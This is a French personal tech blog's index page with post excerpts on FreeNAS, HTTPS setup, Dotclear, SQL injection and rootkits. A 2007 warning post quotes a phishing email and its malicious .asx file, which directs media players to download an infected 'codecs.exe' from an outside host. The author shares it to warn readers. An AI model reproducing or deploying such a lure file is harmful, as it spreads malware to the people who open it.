Depuis la version sa 0.7, Freenas permet de créer des partage pour Mac utilisable pour les sauvegardes avec Time Machine, le logiciel de sauvegarde intégré aux Macs. Ce billet explique comment créer une Timecapsule utilisable par Time Machine à l'aide de Freenas. Ce billet est un peu long, mais ne vous y fiez pas : il contient des informations pour comprendre et les différentes étapes sont détaillées. Les plus pressés pourront aller directement à la pratique.
mercredi, février 3 2010
Créer une Time Capsule avec Freenas
Par Thomas DAVID le mercredi, février 3 2010, 09:47 - Informatique
mercredi, décembre 9 2009
Transformer un serveur web HTTP en serveur HTTPS sur debian
Par Thomas DAVID le mercredi, décembre 9 2009, 15:50 - Informatique
J'utilise une application de serveur météo installée sur une machine légère. Son développeur a choisi d'utiliser thttpd sur une plateforme Debian Etch. Ce serveur web est réputé pour sa légèreté et sa rapidité, mais ne supporte pas le HTTPS. Ce n'est pas que l'application soit critique, loin de là, mais le HTTP fait partie de ces protocoles historiques de l'Internet où tout circule en clair. Le danger, c'est que n'importe qui capable d'intercepter la communication en un point du réseau peut récupérer les codes d'accès. Comme l'installation représente une somme certaine de travail, je n'ai pas envie qu'un rigolo se prenant pour un [crack]hacker ne vienne casser l'installation. D'autre part, la mise en place d'un flux chiffré n'est pas difficile. Voici comment faire du HTTPS avec un serveur web qui ne l'intègre pas.
vendredi, novembre 27 2009
5 ans deja!
Par Thomas DAVID le vendredi, novembre 27 2009, 17:49 - Dotclear, plugins et cie
Cela fait 5 ans et 6 jours que j'utilise Dotclear pour ce blognote. Certes, 40 billets en 5 ans cela ne fait pas des masses mais je n'ai jamais été un grand rédacteur. Cela dit, cet anniversaire méritait bien un bien un petit billet.
Merci au créateur de Dotclear, et à l'équipe qui maintient maintenant Dotclear .
Plus d'info sur Dotclear? C'est par ici -> http://fr.dotclear.org/
Doclear 1, puis 2...
Par Thomas DAVID le vendredi, novembre 27 2009, 16:49 - Dotclear, plugins et cie
Lors d'une évolution arrive parfois que la mécanique interne d'un programme évolue. Dans le cas de dotclear, la gestion des URL a légèrement changé.
Dotclear 1: http://thoms.free.fr/dotclear/index.php?2006/04/20/26-les-rootkit-et-microsoft
Dotclear 2 : http://thoms.free.fr/dotclear/index.php?post/2006/04/20/26-les-rootkit-et-microsoft
Ce tout petit post ajouté dans les adresses a pour effet de casser toutes les références au blog : moteur de recherche, liens sur les sites, etc... que du 404!
Mais heureusement, avec l'aide de Google je me suis aperçu que l'équipe de développement de Dotclear avait pensé à cela.
Vous trouverez donc un plugin nommé dc1redirect à l'adresse suivante http://plugins.dotaddict.org/dc2/details/dc1redirect qui permet de prendre en compte les requêtes concernant vos billets écrits avec Doclear 1.
Une fois le plugin installé, pensez à l'activer dans les paramètres du blog.
mardi, novembre 17 2009
Injection SQL : petite étude de cas
Par Thomas DAVID le mardi, novembre 17 2009, 14:54 - Informatique
Suite à une actualité professionnelle récente, j'ai été amené à faire l'autopsie d'une attaque par injection SQL sur un serveur web. Cet article détaille le scénario de l'attaque et les techniques utilisées.
mardi, septembre 29 2009
iPhone et sa fuite de données personnelles
Par Thomas DAVID le mardi, septembre 29 2009, 16:18 - Humeurs
Ce mardi 29/09/2009, Mac4ever a mis en lumière une fuite de données concernant le numéro de téléphone de l'iPhone.
Voyons dans l'ordre chronologique comment cela s'est passé et de quoi il s'agit.
lundi, septembre 21 2009
Bidrivals.com : enchères ou loterie?
Par Thomas DAVID le lundi, septembre 21 2009, 14:29 - Humeurs
Au hasard de mon surf je suis tombé sur un site d'enchère un peu particulier. En fait, je devrais plutôt parler de loterie. Voici pourquoi.
vendredi, septembre 4 2009
Nouvelle installation en Dotclear 2
Par Thomas DAVID le vendredi, septembre 4 2009, 15:07 - Dotclear, plugins et cie
Ca faisait un bon moment que ce blog était un peu moribond, un moment que je n'avais pas touché au moteur du blog (Dotclear), un moment que ... Bref Il était grand temps de faire quelque chose. Je me suis donc décidé à changer le moteur de ce blog avec un Dotclear 2 (2.1.5 pour être précis).
mercredi, septembre 5 2007
Résumé ou plagiat ? escrocs d'un genre nouveau
Par Thomas DAVID le mercredi, septembre 5 2007, 21:09 - Humeurs
En février dernier, j'écrivais ce billet suite à un mail que j'avais recu dans ma boite mail. Rien de bien transcendant, mais j'ai voulu faire partager mes conclusions à tous de façon à permettre à d'autres de ne pas se faire avoir par des tentatives d'infections d'un genre nouveau.
mercredi, avril 18 2007
E61 SFR : Nouveau Firmware 3.0633.09.04
Par Thomas DAVID le mercredi, avril 18 2007, 15:14 - Nokia E61 & Symbian
Les possesseurs d'un Nokia E61 le savent, il y a systématiquement une version de retard entre la version du Firmware du modèle standard et celle du modèle SFR. Cela faisait quelques mois qu'on attendais cette version 3.0633.09.04 avec son cortège de corrections. Je ne sais pas si la mise à disposition de cette nouvelle version pour les E61 "brandés" SFR, je ne l'ai vue disponible qu'aujourd'hui.
mercredi, mars 21 2007
MSN sur symbian : mauvaise nouvelle
Par Thomas DAVID le mercredi, mars 21 2007, 12:44 - Nokia E61 & Symbian
"Désolé, ce service n'est disponible pour le moment en dehors de la Chine, Hong Kong et Taiwan"
Arg! Plus de MSN sur mon E61!
Mauvaise nouvelle pour les chanceux (comme moi) qui avait pu récupérer la MSN fournie par un site Chinois : Après l'avoir testé depuis ma connexion Free.fr hier soir, je reçois systématiquement un message spécifiant que le service n'est accessible que depuis la Chine, Hong Kong et Taiwan.

Quel dommage que le service ne soit pas utilisable partout dans la monde dans les même conditions. C'est même surprenant que le service soit réservé à la Chine, d'ordinaire peu en clin à libérer l'Internet.
Toutefois, le message semble indiquer que tout n'est pas perdu : "Ce service n'est disponible pour le moment"
Il est également possible que cela fonctionne malgré tout car le blocage repose certainement sur la définition des plages d'adresses IP associées aux pays concernées. L'expérience a déjà montré par le passé le peu de fiabilité de ces méthodes de filtrage.
jeudi, mars 8 2007
Dotclear 2.0, Free, MySQL et Cie
Par Thomas DAVID le jeudi, mars 8 2007, 22:26 - Dotclear, plugins et cie
EDIT: Ce billet n'est plus d'actualité aujourd'hui (11/09/2009). Voir ce billet.
Avec l'arrivée imminente de Dotclear 2.0, je me suis dit que j'allais essayer cette beta 6 et pourquoi pas migrer définitivement sur dotclear 2.0.
Bon, sur le papier ca l'air super : antispam, tout ca tout ca. En route. Mais je vais vite déchanter. Chez Free.fr - hébergeur de ce blog- il n'est pas possible d'utiliser le moteur de stockage InnoDB. Or celui-ci est requis pour faire tourner Dotclear. Bon bon bon. Depuis l'été dernier, Free a mis à disposition des pages perso la possibilité d'utiliser en lieu et place du serveur MySQL un serveur Postgres. Ca tombe bien, car justement Postgres fonctionne avec Dotclear. Si vous utilisez déjà une base MySQL chez free, le hic c'est que vous devrez renoncer à la base MySQL (et son contenu) pour pouvoir profiter de Postgres. Comme la base MySQL n'est pas utilisée que par Dotclear cela m'obligerai à refaire le tour de tout ce qu'il y a sur ma page perso (genre galerie photo) et la migration vers Postgres n'est pas toujours possible. La seule solution est donc de créer une nouvelle page perso en utilisant Postgres cette fois ci.
Comme je ne voulais pas non plus créer de nouvelle page perso (je sais, je cumule) j'ai fini par m'en sortir en bricolant, mais je n'en suis pas fier pour le moment :-/
Pour faire tourner Dotclear avec free et MySQL, j'ai appliqué des patches pour forcer dotclear à utiliser le moteur de stockage MyISAM. C'est expliqué ici : http://balluche.free.fr/?1051/Installer-DotClear-Beta2-sur-Free Ca fonctionne (bien?) à la condition sine qua non de faire une installation neuve. La migration est impossible (de toutes les façons, c'est déjà assez sale comme ca).
Pour faire une nouvelle installation sur le même compte Free sans shooter mon blog actuel, j'ai juste changé le préfixe des tables dans le fichier de configuration.
Ensuite, j'ai exporté puis importé le blog en utilisant cette procédure : http://doc.dotclear.net/2.0/administration/dc1_vers_dc2 Comme tu le faisais remarquer, j'ai du modifier le fichier de sauvegarde généré par le plugin flat export. Un message de warning en guise d'entête empêchait le fichier d'être reconnu comme un fichier d'import valide...
J'ai bien un dotclear 2.0 qui tourne, mais je n'ai aucune confiance quant la durée de vie de cette installation. Le moteur de stockage MySQL est forcé à MyISAM et il semble que le code de Dotclear ne soit pas prévu pour ca.
Bref, dotclear 2.0, Free et Mysql, pour moi ca sera wait & see pour le moment.
Merci à Gerald et son blog et à Balluche pour leurs conseils.
lundi, février 19 2007
Méthode d'infection virale d'un nouveau genre
Par Thomas DAVID le lundi, février 19 2007, 17:31 - Informatique
Un nouveau mode de propagation de virus utilisant la messagerie est apparu récemment. Il se présente sous la forme d'un message texte relativement quelconque en français et d'une vidéo. Contrairement au méthodes habituelles d'infection, le virus ne transite pas par la messagerie. Le message n'est donc pas stoppé par les équipements habituels de sécurité.
En fait de vidéo, il s'agit d'un fichier .asx. Ces fichiers sont des fichiers de contrôles pour les lecteurs médias (Winmap, Windows Media Player, etc.). Dans ce fichier sont indiqué l'adresse de téléchargement de la vidéo et en cas de besoin l'adresse des codecs nécessaires à la lecture de la vidéo. Lorsque le lecteur télécharge et tente de lire la vidéo, bien entendu des codecs sont nécessaires pour la lecture de celle-ci. Le lecteur va donc interroger l'adresse renseignée dans le .asx pour récupérer les codecs. Or le fichier de codecs est un exécutable infecté par un virus. Le dernier rempart contre l'infection du poste est l'antivirus local (à jour) du poste.
un exemple :
From: "aaa@bbbb.com" <aaa@bbbb.com> Subject: Anniversaire C' est le film de mon anniversaire... Peux tu reconnaître qui est a coté de moi?
Et le fichier vidéo.asx associé
<ASX version="3.0"> <ENTRY> <TITLE>Codec not found</TITLE> <REF HREF ="http://updatecodecs.t35.com/video.avi"/> <DURATION VALUE="60:00"/> <BANNER HREF ="http://updatecodecs.t35.com/img_en.gif"> <ABSTRACT>Download Codecs</ABSTRACT> <MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" /> </BANNER> </ENTRY> </ASX>
Visiblement cet article a inspiré certains. Lisez la suite ici
Billet nombriliste II, le retour des stats
Par Thomas DAVID le lundi, février 19 2007, 16:29 - Divers
Comme pour l'année 2005, voici quelques chiffres concernant ce blog pour l'année 2006. Comme je m'y prends un peu tard et que les statistiques sont sur un an glissant, il manque les chiffres sur janvier et février 2006.
Vie du blog
Tour à tour, les commentaires puis les trackbacks ont été pris d'assaut par des spammeurs fous vantant les mérites de pilules bleues ou rouges ou encore l'interet de tel ou tel casino en ligne. J'ai du prendre des mesures, parfois draconiennes. Le seul but des ces "barbouillages" comme certains les appellent, est d'augmenter le score des sites vantés dans Google. En effet, la proximité des mots clé et des adresse permet à Google d'améliorer les résultat de vos recherches et cela donne des idées à certains...
Comme à chaque fois pour les chiffre de sites web, les valeurs brutes n'ont que peu de sens. C'est surtout l'évolution de ces chiffres qui est intéressante. Globalement, vous êtes deux fois plus nombreux à visiter ce site que l'année dernière. Mais je ne saurais démêler de manière certaines les visiteurs des spammeurs.
Pour ce qui est des billets consultés, la configuration WAP pour GPRS sur SFR reste un grand classique, puisque ce billet a été consulté environ 6600 fois. Pour les autres, ils sont rarement consultés plus de 1000 fois. On peut citer ceux-ci :
- FSM Moving Maps lu 1600 fois.
- Captcha ? Késako? lu 1500 fois.
- POD XT : un premier apercu de la bête lu 1000 fois. Un bien bel appareil dont je me suis séparé à regret faute de temps pour l'utiliser.
- Controle des spoilers lu 1000 fois.
Les mots clés du blog
Conformément aux billets les plus consultés, les principaux mots clé utilisés pour trouver ce site tournent autours de SFR (12%), WAP (5%), configuration (5%), GPRS (4%).
Les navigateurs
Explorer 54.19%
Firefox 32.47%- Les autres : 13%
Les Systèmes d'exploitation
Windows 90%
Linux 4%
MacOS 2%- Les autres 4%
Indexation
Comme en 2005,
Google et
Yahoo sont les deux moteurs de recherche qui indexent régulièrement ce blog.
vendredi, février 2 2007
Adieu trackbacks...
Par Thomas DAVID le vendredi, février 2 2007, 10:45 - Dotclear, plugins et cie
Après les commentaires, c'est au tour des trackbacks d'être victime de campagne de spam massives. Bien qu'il existe des tentatives pour limiter ces spams dans les trackbacks, contrairement aux commentaires (cf. mon post sur les captcha) aucune solution infaillible n'existe pour le moment.
En attendant une solution aussi efficace que le captcha, les trackbacks sont fermés jusqu'à nouvel ordre.
lundi, janvier 29 2007
E61 en poche
Par Thomas DAVID le lundi, janvier 29 2007, 15:14 - Nokia E61 & Symbian
Mon bon vieux K700 Sony Erricson m'ayant définitivement laché, j'ai récemment fait l'acquisition d'un nouveau téléphone. Le cahier des charges était le suivant :
- Il devait être abordable (moins de 200€).
- Synchroniser au moins les contacts via bluetooth.
- Il devait si possible intégrer un client SIP afin d'utiliser ma ligne Free via la VoIP (et donc une connexion wifi).
A ce petit jeu, c'est une offre SFR en renouvèlement qui a retenu mon attention. Pourtant habitué à des offres de renouvèlements plutot moyennes, je suis tombé sur le Nokia E61 qui compte tenu de mes points (30 000) était à 109€. On peut également trouver le E61 en boutique SFR pour 99€ avec un nouvel abonnement.
Sur le papier, il répond à mes attentes. Il intègre un partie VoIP et il est abordable. En plus, Freephonie.org le référence comme un téléphone qui fonctionne avec le SIP Free (cf. ce tutorial). Cependant il ne dispose pas d'appareil photo, mais cela ne me préoccupe pas. Une fois le joujou en poche la première impression est très bonne : l'écran est large, le confort d'utilisation est là. Le clavier AZERTY complet offre un confort de saisie très appréciable.
Les bonnes surprises :
- Client de messagerie électronique intégré (IMAP4 / POP3). Il est également possible d'utiliser des connecteurs Blackberry ou Exchange mais je n'en n'ai pas l'usage.
- Le navigateur web (pas le WAP) est très ingénieux. Le système de scrolling avec miniature compense bien la taille réduite de l'écran (pour cet usage précis, tout est relatif :-) ) et le rend presque utilisable pour naviguer sur le web.
- Les fichiers Office Microsoft sont exploitables sur le téléphone (en pièce jointes d'un message ou en direct).
- Il y a pas mal d'applications disponibles (voir ma sélection plus bas).
Les choses moins agréables :
- Le téléphone est gros. Large surtout. Il l'est plus que les Treo par exemple. Il prend beaucoup de place dans la poche d'un pantalon et on a souvent envie de l'extraire pour le poser sur la table.
- En main, la tenue n'est pas exemplaire. Il n'a pas la forme arrondie au dos des Treo qui rend l'usage à une main si confortable.
- Pas de verrouillage automatique du clavier. Mais cela peut etre compensé en installant le programme Autolock (voir plus bas).
- La version du firmware livrée (2.0618.06.05) a une version de retard sur le modèle non packagé (3.0633.09.04). Là où le bas blesse c'est que les modèles packagé par les opérateurs utilise des codes produits différents. Il faut donc attendre patiemment qu'un firmware packagé SFR soit mis en ligne ou basculer vers le firmware E61 générique (attention, théoriquement cela annule la garantie).
- Un souci de compatibilité est apparu entre mon routeur Linksys WRT54GS v.4 sur lequel tourne DD-WRT v.23 SP2 standard.
Les applications
Voici la liste des applications installées sur mon E61 (dont un certain nombre sont listées sur ce site) :
- Autolock :utilitaire pour permettre au téléphone de se verrouiller automatiquement : http://fuse.stc.cx/autolock/
- Nokia Podcasting : Une application de podcasting pour Symbian : http://www.blogs.s60.com/nokiapodcasting/
- Zipmanager : gestion des archives ZIP : http://www.europe.nokia.com/...
- Screenshot 2 : faire des copies des d'écran : http://www.antonypranata.com/...
- Search : http://mobilesearch.nokia.com/index.html
- PVPLayer : Un lecteur vidéo : http://www.planete-nokia.com/...
- Y Browser : un explorateur de fichier : http://www.pushl.com/y_browser/
- DivX Player : Un lecteur vidéo : http://mobile.divx.com/DivXMobileDownload.xhtml
- Qreader : un lecteur de ebook : http://www.qreader.com/en/main
- Windows Live Messenger : Le client bien connu, mais très difficile à trouver. Il a été diffusé sur un site chinois avant de disparaitre et d'être annoncer comme payant. Mais en cherchant bien on le trouve.
- Internet Radio : http://opensource.nokia.com/...
- Putty : le célèbre client ssh: http://s2putty.sourceforge.net/
Dans les applications que je dois essayer, Salling Clicker semble être un must-have.
Quelques liens pour configurer un Nokia avec free :
- Le tutorial sur Freephonie.org : http://www.freephonie.org/...
- Le tutorial sur Symbian France : http://symbianfrance.com/...
samedi, avril 22 2006
Réceptionner des fichiers via IRDA sous Ubuntu
Par Thomas DAVID le samedi, avril 22 2006, 19:44 - Informatique
Voici une petite astuce pour réceptionner autant de fichiers que vous le voudrez via le port IrDa d'un portable utilisant la distribution linux Ubuntu. C'est particulièrement utile lorsque vous voulez envoyer plusieurs photo d'un téléphone par exemple. Elle s'adresse aux personnes qui ne sont pas familière avec programmation en shell.
Par défaut, le support de l'infrarouge n'est pas installé. Avant toute chose, vous devez donc installer le support de l'IrDa sur votre système Ubuntu. La démarche n'est pas bien compliqué. Tout est expliqué sur cette page : http://doc.ubuntu-fr.org/materiel/port_irda.
Une fois que l'IrDa est utilisable sur votre système, ouvrez un terminal et placez vous dans le répertoire de réception des fichiers. Puis tapez la commande suivante :
while(true); do ircp -r; done
Et voila, votre portable réceptionnera autant de fichiers que vous le voudrez. Une fois les transferts terminés, arrêtez le script avec la combinaison de touche CRTL + c. Les fichiers se trouvent dans le répertoire où vous avez lancé la commande.
Si ce billet vous a été utile, laissez moi un petit commentaire. Ca fait toujours plaisir :-)
jeudi, avril 20 2006
les rootkit et Microsoft
Par Thomas DAVID le jeudi, avril 20 2006, 14:41 - Informatique
Depuis quelques mois, les utilisateurs des produits Microsoft découvrent une terrible menace : les rootkits. C'est quoi un rootkit? C'est une tentative subversive de déstabilisation des produits de la marque à la fenêtre par des barbus soixante-huitards défenseur de Linux.
Un peu de sérieux! Voyons ce qu'est réellement un rootkit et comment cela s'applique aux systèmes Microsoft.
mercredi, février 22 2006
Captcha ? Késako?
Par Thomas DAVID le mercredi, février 22 2006, 12:01 - Dotclear, plugins et cie
"Captcha est un accronyme pour designer le Completely Automated Public Turing test to tell Computers and Humans Apart. En français : un Test public de Turing complètement automatique qui différencie ordinateurs et humains.".
Pourquoi ? Comment ? Lisez la suite!
mardi, février 21 2006
Inauguration du ban par adresse IP
Par Thomas DAVID le mardi, février 21 2006, 11:39 - Dotclear, plugins et cie
Suite au barbouillage de ce site par des personnes peu srcupuleuses cherchant à vendre des produits plus ou moins douteux, je bannirais systèmatiquement toutes les adresses IP ayant utilisant les commentaires de manière détournée à des fin publicitaires ou sans rapport avec le billet.
Comment faire pareil sur vos pages perso Free ? lisez la suite!
« billets précédents - page 1 de 2